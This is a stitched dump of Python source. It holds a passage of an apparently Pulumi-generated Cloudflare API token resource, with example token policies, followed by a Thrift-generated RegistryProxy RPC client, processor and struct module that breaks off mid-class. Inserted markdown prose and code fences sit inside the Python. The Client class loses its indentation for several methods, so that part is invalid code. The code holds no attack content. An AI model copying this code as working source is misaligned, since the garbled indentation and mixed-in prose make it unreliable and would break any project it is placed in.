            name="dns_tls_edit_all_except_one",
            policies=[
                cloudflare.ApiTokenPolicyArgs(
                    permission_groups=[all.permissions["DNS Write"]],
                    resources={
                        "com.cloudflare.api.account.zone.*": "*",
                    },
                ),
                cloudflare.ApiTokenPolicyArgs(
                    permission_groups=[all.permissions["DNS Write"]],
                    resources={
                        f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
                    },
                    effect="deny",
                ),
            ])
        # Token allowed to edit DNS entries for all zones from specific account.
        dns_edit_all_account = cloudflare.ApiToken("dnsEditAllAccount",
            name="dns_edit_all_account",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["DNS Write"]],
                resources={
                    f"com.cloudflare.api.account.{var['account_id']}": json.dumps({
                        "com.cloudflare.api.account.zone.*": "*",
                    }),
                },
            )])
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']] condition: Condition block. See the definition below.
        :param pulumi.Input[str] name: Name of the APIToken.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]] policies: Permissions policy. Multiple policy blocks can be defined.
               See the definition below.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ApiTokenArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a resource which manages Cloudflare API tokens.

        Read more about permission groups and their applicable scopes in
        [the official documentation](https://developers.cloudflare.com/api/tokens/create/permissions).

        ## Example Usage
        ### User Permissions

        ```python
        import pulumi
        import pulumi_cloudflare as cloudflare

        all = cloudflare.get_api_token_permission_groups()
        # Token allowed to create new tokens.
        # Can only be used from specific ip range.
        api_token_create = cloudflare.ApiToken("apiTokenCreate",
            name="api_token_create",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["API Tokens Write"]],
                resources={
                    f"com.cloudflare.api.user.{var['user_id']}": "*",
                },
            )],
            condition=cloudflare.ApiTokenConditionArgs(
                request_ip=cloudflare.ApiTokenConditionRequestIpArgs(
                    ins=["192.0.2.1/32"],
                    not_ins=["198.51.100.1/32"],
                ),
            ))
        ```
        ### Account permissions

        ```python
        import pulumi
        import pulumi_cloudflare as cloudflare

        all = cloudflare.get_api_token_permission_groups()
        # Token allowed to read audit logs from all accounts.
        logs_account_all = cloudflare.ApiToken("logsAccountAll",
            name="logs_account_all",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["Access: Audit Logs Read"]],
                resources={
                    "com.cloudflare.api.account.*": "*",
                },
            )])
        # Token allowed to read audit logs from specific account.
        logs_account = cloudflare.ApiToken("logsAccount",
            name="logs_account",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["Access: Audit Logs Read"]],
                resources={
                    f"com.cloudflare.api.account.{var['account_id']}": "*",
                },
            )])
        ```
        ### Zone Permissions

        ```python
        import pulumi
        import json
        import pulumi_cloudflare as cloudflare

        all = cloudflare.get_api_token_permission_groups()
        # Token allowed to edit DNS entries and TLS certs for specific zone.
        dns_tls_edit = cloudflare.ApiToken("dnsTlsEdit",
            name="dns_tls_edit",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[
                    all.permissions["DNS Write"],
                    all.permissions["SSL and Certificates Write"],
                ],
                resources={
                    f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
                },
            )])
        # Token allowed to edit DNS entries for all zones except one.
        dns_tls_edit_all_except_one = cloudflare.ApiToken("dnsTlsEditAllExceptOne",
            name="dns_tls_edit_all_except_one",
            policies=[
                cloudflare.ApiTokenPolicyArgs(
                    permission_groups=[all.permissions["DNS Write"]],
                    resources={
                        "com.cloudflare.api.account.zone.*": "*",
                    },
                ),
                cloudflare.ApiTokenPolicyArgs(
                    permission_groups=[all.permissions["DNS Write"]],
                    resources={
                        f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
                    },
                    effect="deny",
                ),
            ])
        # Token allowed to edit DNS entries for all zones from specific account.
        dns_edit_all_account = cloudflare.ApiToken("dnsEditAllAccount",
            name="dns_edit_all_account",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["DNS Write"]],
                resources={
                    f"com.cloudflare.api.account.{var['account_id']}": json.dumps({
                        "com.cloudflare.api.account.zone.*": "*",
                    }),
                },
            )])
        ```

        :param str resource_name: The name of the resource.
        :param ApiTokenArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(ApiTokenArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 condition: Optional[pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ApiTokenArgs.__new__(ApiTokenArgs)

            __props__.__dict__["condition"] = condition
            if name is None and not opts.urn:
                raise TypeError("Missing required property 'name'")
            __props__.__dict__["name"] = name
            if policies is None and not opts.urn:
                raise TypeError("Missing required property 'policies'")
            __props__.__dict__["policies"] = policies
            __props__.__dict__["issued_on"] = None
            __props__.__dict__["modified_on"] = None
            __props__.__dict__["status"] = None
            __props__.__dict__["value"] = None
        super(ApiToken, __self__).__init__(
            'cloudflare:index/apiToken:ApiToken',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            condition: Optional[pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']]] = None,
            issued_on: Optional[pulumi.Input[str]] = None,
            modified_on: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]]] = None,
            status: Optional[pulumi.Input[str]] = None,
            value: Optional[pulumi.Input[str]] = None) -> 'ApiToken':
        """
        Get an existing ApiToken resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']] condition: Condition block. See the definition below.
        :param pulumi.Input[str] issued_on: The RFC3339 timestamp of when the API Token was issued.
        :param pulumi.Input[str] modified_on: The RFC3339 timestamp of when the API Token was last modified.
        :param pulumi.Input[str] name: Name of the APIToken.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]] policies: Permissions policy. Multiple policy blocks can be defined.
               See the definition below.
        :param pulumi.Input[str] value: The value of the API Token.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _ApiTokenState.__new__(_ApiTokenState)

        __props__.__dict__["condition"] = condition
        __props__.__dict__["issued_on"] = issued_on
        __props__.__dict__["modified_on"] = modified_on
        __props__.__dict__["name"] = name
        __props__.__dict__["policies"] = policies
        __props__.__dict__["status"] = status
        __props__.__dict__["value"] = value
        return ApiToken(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def condition(self) -> pulumi.Output[Optional['outputs.ApiTokenCondition']]:
        """
        Condition block. See the definition below.
        """
        return pulumi.get(self, "condition")

    @property
    @pulumi.getter(name="issuedOn")
    def issued_on(self) -> pulumi.Output[str]:
        """
        The RFC3339 timestamp of when the API Token was issued.
        """
        return pulumi.get(self, "issued_on")

    @property
    @pulumi.getter(name="modifiedOn")
    def modified_on(self) -> pulumi.Output[str]:
        """
        The RFC3339 timestamp of when the API Token was last modified.
        """
        return pulumi.get(self, "modified_on")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of the APIToken.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def policies(self) -> pulumi.Output[Sequence['outputs.ApiTokenPolicy']]:
        """
        Permissions policy. Multiple policy blocks can be defined.
        See the definition below.
        """
        return pulumi.get(self, "policies")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def value(self) -> pulumi.Output[str]:
        """
        The value of the API Token.
        """
        return pulumi.get(self, "value")
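# The dns_edit_all_account example in the docstrings above nests a JSON-encoded
# zone scope inside the account-level resource key. That encoding can be checked
# without the Pulumi engine (the account id below is a placeholder, not real):

```python
import json

account_id = "0123456789abcdef"  # placeholder account id, for illustration only
key = "com.cloudflare.api.account.{}".format(account_id)
resources = {
    key: json.dumps({
        "com.cloudflare.api.account.zone.*": "*",
    }),
}
print(resources[key])  # {"com.cloudflare.api.account.zone.*": "*"}
```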

# ============================================================
# File: py/RegistryProxy.py
# Repo: cychenyin/sfproxy (Apache-2.0)
# ============================================================
#
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from thrift.Thrift import *
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
    from thrift.protocol import fastbinary
except ImportError:
    fastbinary = None

class Iface:
    def get(self, serviceName):
        """
        Parameters:
         - serviceName
        """
        pass

    def remove(self, serviceName, host, port):
        """
        Parameters:
         - serviceName
         - host
         - port
        """
        pass

    def dump(self):
        pass

    def reset(self):
        pass

    def status(self):
        pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def get(self, serviceName):
"""
Parameters:
- serviceName
"""
self.send_get(serviceName)
return self.recv_get()
def send_get(self, serviceName):
self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid)
args = get_args()
args.serviceName = serviceName
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result");
def remove(self, serviceName, host, port):
"""
Parameters:
- serviceName
- host
- port
"""
self.send_remove(serviceName, host, port)
return self.recv_remove()
def send_remove(self, serviceName, host, port):
self._oprot.writeMessageBegin('remove', TMessageType.CALL, self._seqid)
args = remove_args()
args.serviceName = serviceName
args.host = host
args.port = port
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_remove(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = remove_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "remove failed: unknown result");
def dump(self, ):
self.send_dump()
return self.recv_dump()
def send_dump(self, ):
self._oprot.writeMessageBegin('dump', TMessageType.CALL, self._seqid)
args = dump_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_dump(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = dump_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "dump failed: unknown result");

  def reset(self, ):
    self.send_reset()
    return self.recv_reset()

  def send_reset(self, ):
    self._oprot.writeMessageBegin('reset', TMessageType.CALL, self._seqid)
    args = reset_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_reset(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = reset_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success != None:
      return result.success
    raise TApplicationException(TApplicationException.MISSING_RESULT, "reset failed: unknown result");

  def status(self, ):
    self.send_status()
    return self.recv_status()

  def send_status(self, ):
    self._oprot.writeMessageBegin('status', TMessageType.CALL, self._seqid)
    args = status_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_status(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = status_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success != None:
      return result.success
    raise TApplicationException(TApplicationException.MISSING_RESULT, "status failed: unknown result");

class Processor(Iface, TProcessor):
  def __init__(self, handler):
    self._handler = handler
    self._processMap = {}
    self._processMap["get"] = Processor.process_get
    self._processMap["remove"] = Processor.process_remove
    self._processMap["dump"] = Processor.process_dump
    self._processMap["reset"] = Processor.process_reset
    self._processMap["status"] = Processor.process_status

  def process(self, iprot, oprot):
    (name, type, seqid) = iprot.readMessageBegin()
    if name not in self._processMap:
      iprot.skip(TType.STRUCT)
      iprot.readMessageEnd()
      x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
      oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
      x.write(oprot)
      oprot.writeMessageEnd()
      oprot.trans.flush()
      return
    else:
      self._processMap[name](self, seqid, iprot, oprot)
    return True

  def process_get(self, seqid, iprot, oprot):
    args = get_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_result()
    result.success = self._handler.get(args.serviceName)
    oprot.writeMessageBegin("get", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_remove(self, seqid, iprot, oprot):
    args = remove_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = remove_result()
    result.success = self._handler.remove(args.serviceName, args.host, args.port)
    oprot.writeMessageBegin("remove", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_dump(self, seqid, iprot, oprot):
    args = dump_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = dump_result()
    result.success = self._handler.dump()
    oprot.writeMessageBegin("dump", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_reset(self, seqid, iprot, oprot):
    args = reset_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = reset_result()
    result.success = self._handler.reset()
    oprot.writeMessageBegin("reset", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_status(self, seqid, iprot, oprot):
    args = status_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = status_result()
    result.success = self._handler.status()
    oprot.writeMessageBegin("status", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
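The `_processMap` above stores unbound methods keyed by RPC name, then calls them as `self._processMap[name](self, seqid, iprot, oprot)`. A stripped-down sketch of the same dispatch pattern, with the Thrift transport removed and a hypothetical handler standing in (all names here are illustrative, not part of the generated code):

```python
# Minimal stand-in for the Processor dispatch pattern: a dict maps method
# names to unbound functions, which are called with the instance passed
# explicitly, just as Processor.process_get is called above.
class EchoHandler(object):
    def status(self):
        return 0


class MiniProcessor(object):
    def __init__(self, handler):
        self._handler = handler
        self._processMap = {"status": MiniProcessor.process_status}

    def process(self, name):
        # Unknown names raise, mirroring the UNKNOWN_METHOD branch above.
        if name not in self._processMap:
            raise KeyError("Unknown function %s" % name)
        return self._processMap[name](self)

    def process_status(self):
        return self._handler.status()


print(MiniProcessor(EchoHandler()).process("status"))  # -> 0
```

The dict-of-unbound-methods form lets subclasses extend the map without touching `process`, which is why the generated code prefers it over a chain of `if name == ...` tests.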

# HELPER FUNCTIONS AND STRUCTURES

class get_args:
  """
  Attributes:
   - serviceName
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'serviceName', None, None, ), # 1
  )

  def __init__(self, serviceName=None,):
    self.serviceName = serviceName

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.serviceName = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_args')
    if self.serviceName != None:
      oprot.writeFieldBegin('serviceName', TType.STRING, 1)
      oprot.writeString(self.serviceName)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.serviceName is None:
      raise TProtocol.TProtocolException(message='Required field serviceName is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
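The `read` loop above skips unknown field ids and terminates on `TType.STOP`, which is what makes Thrift structs forward-compatible with newer schemas. The same pattern over a plain list of `(field_id, value)` pairs, with no Thrift protocol involved (all names illustrative):

```python
# Sketch of the STOP-terminated field loop used by the generated read()
# methods, reading (field_id, value) pairs from a list. A field id of
# None plays the role of TType.STOP here.
STOP = None

def read_fields(stream):
    known = {}
    for fid, value in stream:
        if fid is STOP:
            break
        if fid == 1:                    # known field: keep it
            known['serviceName'] = value
        # any other field id is skipped, like iprot.skip(ftype)
    return known

print(read_fields([(2, 'ignored'), (1, 'svc'), (STOP, None)]))
# -> {'serviceName': 'svc'}
```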

class get_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class remove_args:
  """
  Attributes:
   - serviceName
   - host
   - port
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'serviceName', None, None, ), # 1
    (2, TType.STRING, 'host', None, None, ), # 2
    (3, TType.I32, 'port', None, None, ), # 3
  )

  def __init__(self, serviceName=None, host=None, port=None,):
    self.serviceName = serviceName
    self.host = host
    self.port = port

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.serviceName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.host = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.port = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('remove_args')
    if self.serviceName != None:
      oprot.writeFieldBegin('serviceName', TType.STRING, 1)
      oprot.writeString(self.serviceName)
      oprot.writeFieldEnd()
    if self.host != None:
      oprot.writeFieldBegin('host', TType.STRING, 2)
      oprot.writeString(self.host)
      oprot.writeFieldEnd()
    if self.port != None:
      oprot.writeFieldBegin('port', TType.I32, 3)
      oprot.writeI32(self.port)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.serviceName is None:
      raise TProtocol.TProtocolException(message='Required field serviceName is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class remove_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('remove_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class dump_args:

  thrift_spec = (
  )

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('dump_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class dump_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('dump_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class reset_args:

  thrift_spec = (
  )

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('reset_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class reset_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('reset_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class status_args:

  thrift_spec = (
  )

